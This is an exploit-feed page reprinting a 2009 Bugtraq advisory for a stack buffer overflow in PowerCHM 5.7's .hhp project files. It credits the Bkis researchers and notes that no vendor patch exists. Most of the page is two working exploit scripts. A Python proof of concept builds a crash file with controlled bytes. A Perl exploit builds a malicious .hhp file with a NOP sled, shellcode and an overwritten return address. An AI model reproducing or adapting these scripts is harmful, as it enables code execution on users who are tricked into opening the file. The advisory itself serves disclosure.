|
Feeds -
Exploits
|
|
Written by Le Duc Anh, Bkis
|
|
Monday, 30 March 2009 22:15 |
PowerCHM '.HHP' File Stack Buffer Overflow Vulnerability
-\\Bugtraq ID:
34263
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 26 2009 12:00AM
-\\Updated:
Mar 30 2009 04:46PM
-\\Credit:
Le Duc Anh, Bkis
-\\Vulnerable:
Dawningsoft PowerCHM 5.7
-\\Discussion
PowerCHM is prone to a stack-based buffer-overflow vulnerability because it
fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary
code in the context of the application. Failed exploit attempts will cause
denial-of-service conditions.
PowerCHM 5.7 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
To exploit this issue, an attacker must entice an unsuspecting user to open a
malicious file using the affected application.
Exploits are available:
===============================================================
34263.py
^^^^^^^^^
# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Orginally Discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#
header = (
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=aaaaaa.hhc\n"
"Index file=aaaaaa.hhk\n"
"Language=0x813 Dutch (Belgium)\n"
"Title=\n"
"Error log file=Errlog.txt\n"
"Default Window=main\n\n"
"[WINDOWS]\n"
'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584]
,,,,0,0,0,0\n\n'
"[FILES]\n\n"
"[INFOTYPES]\n")
file=open('poc.hhp','w')
file.write(header+"\x41"*999+"\x42\x42\x42\x42"+"\x43"*500)
file.close()
# milw0rm.com [2009-03-27]
===============================================================
34263.pl
^^^^^^^^^
#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs: http://www.milw0rm.com/exploits/8300
# http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#
my $header="
[OPTIONS]\n
Compatibility=1.1 or later\n
Compiled file=zero.chm\n
Contents file=science.hhc\n
Index file=lqwrm.hhk\n
Binary Index=Yes\n
Language=0x042F\n
Title=\n
Error log file=Errlog.txt\n
Default Window=main\n\n
[WINDOWS]\n
main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584]
,,,,0,0,0,0\n\n
[FILES]\n\n
[INFOTYPES]\n
";
my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;
my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "\nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "\nFile $file successfully created!\n";
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in
error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--PowerCHM Homepage
http://www.dawningsoft.com/products/powerchm.ht (Dawningsoft)
--[Bkis-05-2009] PowerCHM Stack-based Buffer Overflow
http://www.securityfocus.com/archive/1/50220 (Bkis <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
|
|
